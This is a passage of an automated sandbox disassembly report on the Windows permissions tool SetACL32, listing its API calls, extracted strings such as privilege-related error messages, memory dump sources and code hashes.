                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastSecurity$CloseKernelObject$AbsoluteCreateFileHandleInfoMakeNamed_free
                • String ID: @M)w$SeSecurityPrivilege
                • API String ID: 896392196-2039830501
                • Opcode ID: 68cea7a69c76b8d2a578d7a36ba75851abe7be7cf8e8fbb3e5ac6a35b9653ba5
                • Instruction ID: d1d5243268df2a867aabc6a1bd8a78c8bf82dec6ab0ad309ce65dc3de85388de
                • Opcode Fuzzy Hash: 68cea7a69c76b8d2a578d7a36ba75851abe7be7cf8e8fbb3e5ac6a35b9653ba5
                • Instruction Fuzzy Hash: 3D12C1B1E003099BEF60DFA4CC85BEEBBB9AF04310F544529E505E7291DB74E948EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                • GetVersionExW.KERNEL32(?), ref: 00F6EAB3
                • GetVersionExW.KERNEL32(0000011C), ref: 00F6EACE
                • GetLastError.KERNEL32 ref: 00F6EAD8
                  • Part of subcall function 00F621B0: GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                  • Part of subcall function 00F621B0: OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                  • Part of subcall function 00F621B0: GetLastError.KERNEL32 ref: 00F62219
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69AA5
                  • Part of subcall function 00F74BF0: std::locale::_Init.LIBCPMT ref: 00F75AA6
                Strings
                • Object path and/or object type not specified., xrefs: 00F6E8D5
                • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00F6F004
                • Prepare, xrefs: 00F6E909, 00F6E9D4, 00F6EB25, 00F6EC31, 00F6EE34, 00F6F038, 00F6F23C
                • SeTakeOwnershipPrivilege, xrefs: 00F6F0F6
                • SeRestorePrivilege, xrefs: 00F6EEF2
                • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00F6F208
                • @M)w, xrefs: 00F6EAD8
                • Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00F6EE00
                • The object type was not specified., xrefs: 00F6E9A0
                • SeBackupPrivilege, xrefs: 00F6ECEE
                • The version of your operating system could not be determined., xrefs: 00F6EAF1
                • +qmt, xrefs: 00F6F487
                • SetACL only supports Windows Vista and later., xrefs: 00F6EBFD
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$CurrentNameProcessTimeUserVersion$CriticalEnterFileInitOpenSectionSystemThreadTokenstd::locale::_
                • String ID: +qmt$@M)w$Object path and/or object type not specified.$Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeBackupPrivilege$SeRestorePrivilege$SeTakeOwnershipPrivilege$SetACL only supports Windows Vista and later.$The object type was not specified.$The version of your operating system could not be determined.
                • API String ID: 182104191-3836827182
                • Opcode ID: 8178809b45810c718b29fbb2eda7387d29f30890ff4e7b0cdbe3344125d5cb40
                • Instruction ID: 15835e285ee5bdccb13e6a1c1472b0256ed940abfb300f41a40303070600ab11
                • Opcode Fuzzy Hash: 8178809b45810c718b29fbb2eda7387d29f30890ff4e7b0cdbe3344125d5cb40
                • Instruction Fuzzy Hash: 3C62C271A10209DBEF08DFA4CC85BDEBB76BF44314F248218E404BB2D5DB79AA48DB55
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(00FCAA14,00000FA0,?,?,00F8B33D), ref: 00F8B36B
                • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00F8B33D), ref: 00F8B376
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F8B33D), ref: 00F8B387
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F8B399
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F8B3A7
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F8B33D), ref: 00F8B3CA
                • DeleteCriticalSection.KERNEL32(00FCAA14,00000007,?,?,00F8B33D), ref: 00F8B3E6
                • CloseHandle.KERNEL32(00000000,?,?,00F8B33D), ref: 00F8B3F6
                Strings
                • WakeAllConditionVariable, xrefs: 00F8B39F
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F8B371
                • kernel32.dll, xrefs: 00F8B382
                • SleepConditionVariableCS, xrefs: 00F8B393
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 2565136772-3242537097
                • Opcode ID: e89dc4aec195ae39ba9fa3c0ca3d2bf66f42e2651fa05b0a24f3c6e3bf782b23
                • Instruction ID: a21fca0cf72158ca155e78ec5bc05c8533a183e8a8ca26ab0693fc86bd833e62
                • Opcode Fuzzy Hash: e89dc4aec195ae39ba9fa3c0ca3d2bf66f42e2651fa05b0a24f3c6e3bf782b23
                • Instruction Fuzzy Hash: 0C01B5F1E8171AEBD7216BB5AE0EF963A989B427117040021F906E6250DBB8D804FB73
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ConvertStringSidToSidW.ADVAPI32(00FBC3E4,?), ref: 00F879BE
                • IsValidSid.ADVAPI32(?), ref: 00F879D3
                • GetLengthSid.ADVAPI32(?), ref: 00F879DE
                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F879FA
                • LocalFree.KERNEL32(?), ref: 00F87A1D
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                • std::locale::_Init.LIBCPMT ref: 00F87C9A
                • DsGetDcNameW.NETAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F87D73
                • NetApiBufferFree.NETAPI32(?), ref: 00F87DEA
                  • Part of subcall function 00F88D30: LookupAccountNameW.ADVAPI32(00000000,00FBC3E4,00000000,?,00000000,00F87EBC,?), ref: 00F88DAE
                  • Part of subcall function 00F88D30: GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DBA
                  • Part of subcall function 00F88D30: GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DC1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFreeLastName$AccountBufferConvertCopyInitLengthLocalLookupStringValid_freestd::locale::_
                • String ID: computername
                • API String ID: 287987163-1800712684
                • Opcode ID: 33cc195978babe46b796fdf673d1018e94c5d731c900af4b76a4da678690ec7a
                • Instruction ID: cee6c1e684c6cfa77ff971e2cbb86f6caba31b07417cdcde8cb20f33626ac8f2
                • Opcode Fuzzy Hash: 33cc195978babe46b796fdf673d1018e94c5d731c900af4b76a4da678690ec7a
                • Instruction Fuzzy Hash: 6222E171E002488FDF14EFA4CC85BDEBBB6FF84314F244158E405AB295DB39AA89DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: @M)w$api-ms-$ext-ms-
                • API String ID: 0-2512018096
                • Opcode ID: b8ad5bb8d9e93294b282acbf47025c1dcf7ea0b70fba20ba82273a0022f216a6
                • Instruction ID: caf68081651795a45336b66d0047a47633faa9cb89fae9f9bca3f5f019b7ff22
                • Opcode Fuzzy Hash: b8ad5bb8d9e93294b282acbf47025c1dcf7ea0b70fba20ba82273a0022f216a6
                • Instruction Fuzzy Hash: BB21DA72F01624EBEF329B24DC85B6A77589F417B0F2A4121FD06A7291DA70DD00B6E2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • _free.LIBCMT ref: 00F90678
                • _free.LIBCMT ref: 00F90691
                • _free.LIBCMT ref: 00F906CF
                • _free.LIBCMT ref: 00F906D8
                • _free.LIBCMT ref: 00F906E4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorLast
                • String ID: C
                • API String ID: 3291180501-1037565863
                • Opcode ID: 718f83b2fbf309070b11ed147d8bb3428266fecfe249fedb710458ef446dbc64
                • Instruction ID: c04fc87948c59189bdad014c72e46f1244bcd9971d60d93e32176cb3aa677c38
                • Opcode Fuzzy Hash: 718f83b2fbf309070b11ed147d8bb3428266fecfe249fedb710458ef446dbc64
                • Instruction Fuzzy Hash: 9AB13775A012199FEF24DF18CC84AADB3B5FF48314F1045AAE949A7390DB71AE90DF40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • _free.LIBCMT ref: 00F8FFEF
                • _free.LIBCMT ref: 00F90006
                • _free.LIBCMT ref: 00F90023
                • _free.LIBCMT ref: 00F9003E
                • _free.LIBCMT ref: 00F90055
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$AllocateHeap
                • String ID:
                • API String ID: 3033488037-0
                • Opcode ID: c03d8e7e564e3b38a85af985c2053769c324c33fddf1474037eb1178e72c208f
                • Instruction ID: 3759395b7158d61b70ca11e5924aebffcea47fa6a1a7389577ca75bc4b6989c5
                • Opcode Fuzzy Hash: c03d8e7e564e3b38a85af985c2053769c324c33fddf1474037eb1178e72c208f
                • Instruction Fuzzy Hash: CB51B332A00705AFEF20DF29CC41BAA77F5EF59720B140669E509DB2A1EB35D945EB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32 ref: 00F69535
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F6973F
                  • Part of subcall function 00F69780: EnterCriticalSection.KERNEL32 ref: 00F697B8
                  • Part of subcall function 00F69780: LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 00F62E67
                • RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 00F696A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$EventFileModuleNameRegisterSource
                • String ID: DefaultEventSource
                • API String ID: 3706164908-1672983561
                • Opcode ID: 6c5bd5ee9480791a2ad8b0a8d1ef1a45e6aa9e40dd38d28c833d5a50e459f7dd
                • Instruction ID: f851197862b8d2519ae29a967ce630558f058ed421d6ad2bd91d2124eb54b24d
                • Opcode Fuzzy Hash: 6c5bd5ee9480791a2ad8b0a8d1ef1a45e6aa9e40dd38d28c833d5a50e459f7dd
                • Instruction Fuzzy Hash: E8613571A042099BDF04EFB4CD86BDDB779FB44310F144629F401E7292DBB99A44EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00FC9A90,Function_0004413E,00000000,00000000,00000000), ref: 00F942E3
                • GetLastError.KERNEL32(?,?,?,?,00F696C8,00000000,00000000), ref: 00F942EF
                • __dosmaperr.LIBCMT ref: 00F942F6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CreateErrorLastThread__dosmaperr
                • String ID: @M)w
                • API String ID: 2744730728-1211491014
                • Opcode ID: b1de57d5a23b9a5abaea5e82eec6317b80c7dd01d10a1149ae0344e6c0006e68
                • Instruction ID: 239bc8c818d2e412c9b77246d89fc5dfd36c789516da15b687873d9740a6e135
                • Opcode Fuzzy Hash: b1de57d5a23b9a5abaea5e82eec6317b80c7dd01d10a1149ae0344e6c0006e68
                • Instruction Fuzzy Hash: E1019E72900219AFEF15AFB0DC15EAE7BA5FF24324F000068F80196190DB74EE41FB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(00FC7070,0000000C), ref: 00F94151
                • ExitThread.KERNEL32 ref: 00F94158
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorExitLastThread
                • String ID: @M)w
                • API String ID: 1611280651-1211491014
                • Opcode ID: 0431e9cffae592d81a4d6869ebb95e62819f089f5a0383f19ded26d20bc6c2fd
                • Instruction ID: 94d054f21ff2fb845cd82641ecb200800fb763aaed80fe33cc1b16fc0ed49c0d
                • Opcode Fuzzy Hash: 0431e9cffae592d81a4d6869ebb95e62819f089f5a0383f19ded26d20bc6c2fd
                • Instruction Fuzzy Hash: 1AF08C71A40308AFEF05ABB0CC0AE6E7B64EF51710F100149F01197262CB39A981FB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F69500: EnterCriticalSection.KERNEL32 ref: 00F69535
                  • Part of subcall function 00F69500: RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 00F696A6
                • EnterCriticalSection.KERNEL32(00FCB6D4), ref: 00F51486
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F5149D
                • EnterCriticalSection.KERNEL32(00FCB6D4), ref: 00F514A4
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F514B5
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$Enter$Leave$EventRegisterSource
                • String ID:
                • API String ID: 2153909985-0
                • Opcode ID: cadcd559e9ffdc1701c3718933e6579469c74cf2a10d30c44739ad22f97e3622
                • Instruction ID: 2e38aa95f8d2cc57440060da32d5e6325b1c0d6786e87708cf830d065a9ee39d
                • Opcode Fuzzy Hash: cadcd559e9ffdc1701c3718933e6579469c74cf2a10d30c44739ad22f97e3622
                • Instruction Fuzzy Hash: FA01A2B194420DAFCB10EF61DD47F9A7BA4EB05B10F000168B41857291D7B49804EF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(00003A98), ref: 00F51557
                • CloseHandle.KERNEL32(00000000), ref: 00F5156E
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00F51588
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseDeregisterEventHandleObjectSingleSourceWait
                • String ID:
                • API String ID: 1676057058-0
                • Opcode ID: 0f9dee7f4618ef8a48cd52341947c99f92785571a7de1853d1a5bf9221a1b63d
                • Instruction ID: 154a06a2c03b57fea9a87e2f3a8d7189572f0239c6a52fae6d3e4e7266799dad
                • Opcode Fuzzy Hash: 0f9dee7f4618ef8a48cd52341947c99f92785571a7de1853d1a5bf9221a1b63d
                • Instruction Fuzzy Hash: E421F534A4420E9FDB04DF60DE0BF9A77A5FB94311F1400A9E90A97290DBB89A04FB42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97377: GetLastError.KERNEL32(?,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9737C
                  • Part of subcall function 00F97377: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9741A
                • CloseHandle.KERNEL32(?,?,?,00F9432A,?,?,00F9419C,00000000), ref: 00F94224
                • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00F9432A,?,?,00F9419C,00000000), ref: 00F9423A
                • ExitThread.KERNEL32 ref: 00F94243
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                • String ID:
                • API String ID: 1991824761-0
                • Opcode ID: b04fe3c8336ddc6418c90b0bbe54f22ce1ec2f241b56f230f71aaa5245e58d02
                • Instruction ID: 7d9bd8db4ad181a8c08bd3f1785d09a4b3bb22e93c31bb2230f2d5a72a6fa604
                • Opcode Fuzzy Hash: b04fe3c8336ddc6418c90b0bbe54f22ce1ec2f241b56f230f71aaa5245e58d02
                • Instruction Fuzzy Hash: 65F058309006156BEF211B759C08E6A3A98BFA6374B084650F829C71A0DB34FC82EA91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateMutexW.KERNELBASE(00000000,00000000,00000000), ref: 00F512C6
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F512D9
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F512EC
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Create$Event$Mutex
                • String ID:
                • API String ID: 646228171-0
                • Opcode ID: f32549e10399d7a6a0b9f66e23de3d9da81295345f229d9a8e86e5855c434b2c
                • Instruction ID: 97d2588edd5ddf1a2baee28900651aa70f8976f5c135373d82e4e7e09d5ee180
                • Opcode Fuzzy Hash: f32549e10399d7a6a0b9f66e23de3d9da81295345f229d9a8e86e5855c434b2c
                • Instruction Fuzzy Hash: 39F0A4B2688318EAF7149F65AE1FF423AA0FB05B05F245109F2069F9E0D7FA1044EB44
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F516BF
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: -log
                • API String ID: 1620887387-56760616
                • Opcode ID: 88038badd82d5cda2bb345bde79cbe73995336ba10471da73a7744e6f6eb99d4
                • Instruction ID: 0eca999874004d58106c14e343a6c7822a87d27cbe9b5fbcc1faee8dcebe6396
                • Opcode Fuzzy Hash: 88038badd82d5cda2bb345bde79cbe73995336ba10471da73a7744e6f6eb99d4
                • Instruction Fuzzy Hash: 46512431E002089FCB14DFA8DC85BEEBBB6FF89315F184218E905A7341DB35AA49DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,00FC9AA4,00000007,00F8A0BD,?,00FC6D6C,+qmt), ref: 00F8CDD4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID: +qmt
                • API String ID: 6842923-2222937483
                • Opcode ID: fa5df16410ffc71d35b4470e539cd02fb79cc5f961763d3a7a2622b090cbd42f
                • Instruction ID: 3b6ee4fe67af349ab03d4077fba19d71ff3356b77868eff92c1332a55461136c
                • Opcode Fuzzy Hash: fa5df16410ffc71d35b4470e539cd02fb79cc5f961763d3a7a2622b090cbd42f
                • Instruction Fuzzy Hash: DD018F76900208ABDB01AF58D884BEEBFB8EF45710F15406AED15AB391D770AD01DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00F9AF5D
                • GetFileType.KERNELBASE(00000000), ref: 00F9AF6F
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID:
                • API String ID: 3000768030-0
                • Opcode ID: 02caa8dd710bdf0b130c35f2b4a54b2d617bfc5a0db60e183004694bf5b5e76e
